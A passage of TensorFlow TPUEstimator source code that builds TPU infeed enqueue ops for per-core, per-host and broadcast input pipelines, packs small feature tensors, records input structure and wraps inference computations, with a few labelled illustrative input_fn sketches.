if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
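# NOTE (added illustration): a minimal sketch, not part of the original module,
# of a user-facing `input_fn` that fits the per-Core deployment handled above.
# As the error raised inside `enqueue_ops_fn` states, per-core mode requires
# `input_fn` to return `(features, labels)` rather than a `Dataset`. The
# feature names, shapes, dtypes and the use of `params['batch_size']` are
# illustrative assumptions; TPUEstimator wraps the user's `input_fn` before it
# reaches `generate_per_core_enqueue_ops_fn_for_host`.
def _example_per_core_input_fn(params):
  """Illustrative sketch only; never called by this module."""
  import tensorflow.compat.v1 as tf  # assumed import, used only by the sketch
  batch_size = params['batch_size']  # per-core batch size provided by TPUEstimator
  features = {'x': tf.random.uniform([batch_size, 4])}
  labels = tf.zeros([batch_size], dtype=tf.int32)
  return features, labels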
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
    By providing it as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx, features, labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
      # caller makes sure that this host_id will be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
        # This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(
'Missing or extra enqueue_data for host {}. len(enqueue_data) = {}.'
.format(host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
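# NOTE (added illustration): a minimal sketch, not part of the original module,
# of a user-facing `input_fn` for the PER_HOST_V2 configuration handled above,
# which (per the TypeError raised earlier in this function) must return a
# `tf.data.Dataset`. Shapes, dtypes and `drop_remainder=True` are illustrative
# assumptions; a static batch dimension is needed because TPU infeed requires
# fully-defined shapes.
def _example_per_host_v2_input_fn(params):
  """Illustrative sketch only; never called by this module."""
  import tensorflow.compat.v1 as tf  # assumed import, used only by the sketch
  batch_size = params['batch_size']  # batch size provided by TPUEstimator
  images = tf.random.uniform([128, 28, 28, 1])
  labels = tf.zeros([128], dtype=tf.int32)
  dataset = tf.data.Dataset.from_tensor_slices((images, labels))
  dataset = dataset.repeat().batch(batch_size, drop_remainder=True)
  return dataset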
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals to replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas(including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
array_ops.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
          # For each core, slice out its share of the flattened_inputs.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, ops.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
        # If we find at least `minimum_num_small_features_to_group` small
        # dense features of this dtype, we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
          raise ValueError('{} is reserved as feature key for concatenated '
                           'small features.'.format(key))
features[key] = (array_ops.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = array_ops.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
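# NOTE (added illustration): a minimal sketch, not part of the original module,
# showing how `TensorPacker` above folds several small [batch, k] features of
# the same dtype into one concatenated tensor and later restores the original
# keys. The feature names, sizes and thresholds are illustrative assumptions.
def _example_tensor_packer_usage():
  """Illustrative sketch only; never called by this module."""
  import tensorflow.compat.v1 as tf  # assumed import, used only by the sketch
  features = {name: tf.zeros([8, 1]) for name in ('a', 'b', 'c', 'd', 'e')}
  packer = TensorPacker(small_feature_dim_size=1,
                        minimum_num_small_features_to_group=5)
  packer.maybe_concatenate_features(features)  # 'a'..'e' replaced by one packed tensor
  packer.maybe_split_features(features)  # original keys are restored
  return features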
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
  may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
  and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
  as it expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
    # When tf.while_loop is called, the body function, which invokes the
    # `enqueue_fn` passed in, is called to construct the graph. So, the
    # input_fn structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
      # Invoke the input pipeline for each core, placed on the corresponding
      # host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
      # This branch handles two scenarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
host_device_ids = set()
for replica_id in xrange(self._ctx.num_replicas):
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_device_ids.add(host_id)
for host_id in host_device_ids:
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
          # user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
          # iterator outside of the tf.while_loop, and call iterator.get_next()
          # inside the tf.while_loop. This should always be safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only thing it uses for
    # dequeue is dtypes and shapes. So, any one can be used. Here, grab the
# first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
    Performs some sanity checks to log user-friendly information. We should
    error out to give users a better error message. But, if
    _WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior), we cannot break
    user code, so we log a warning instead.
Raises:
RuntimeError: If the validation failed.
"""
if ops.get_default_graph().get_collection(ops.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
'It could be slow and not scalable. Please consider '
'converting your input pipeline to use `tf.data` instead (see '
'https://www.tensorflow.org/guide/datasets for '
                 'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs,
computation,
batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
    computation: A Python function that takes the computation inputs and builds
      the computation graph. If `computation` returns m outputs, this function
      will return a list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
  # Not using the Batching Function; use TPUPartitionedCall on all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
  # Use the Batching Function and TPUPartitionedCall on all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = nest.flatten(computation_inputs)
@batch_ops.batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = nest.pack_sequence_as(computation_inputs,
tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
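# NOTE (added illustration): a minimal sketch, not part of the original module,
# of driving `call_computation` above at inference time: a dict of input
# tensors plus a Python `computation` that builds the TPU graph from those
# inputs. The names and shapes are illustrative assumptions; with
# `batch_config=None` the inputs go straight through `TPUPartitionedCall`,
# while passing a `BatchConfig` (defined later in this file) additionally
# enables inference batching in front of the same call.
def _example_call_computation():
  """Illustrative sketch only; never called by this module."""
  import tensorflow.compat.v1 as tf  # assumed import, used only by the sketch
  computation_inputs = {'x': tf.placeholder(tf.float32, shape=[None, 4])}
  def computation(inputs):
    # The real model graph would be built here from `inputs`.
    return tf.reduce_sum(inputs['x'], axis=1)
  return call_computation(computation_inputs, computation, batch_config=None)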
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
  This makes calling model_fn on CPU and TPU easier and more consistent, and
  performs the necessary checks and mutations required by TPU training and
  evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
    tf.while_loop control flow to repeat many times and then replicated to
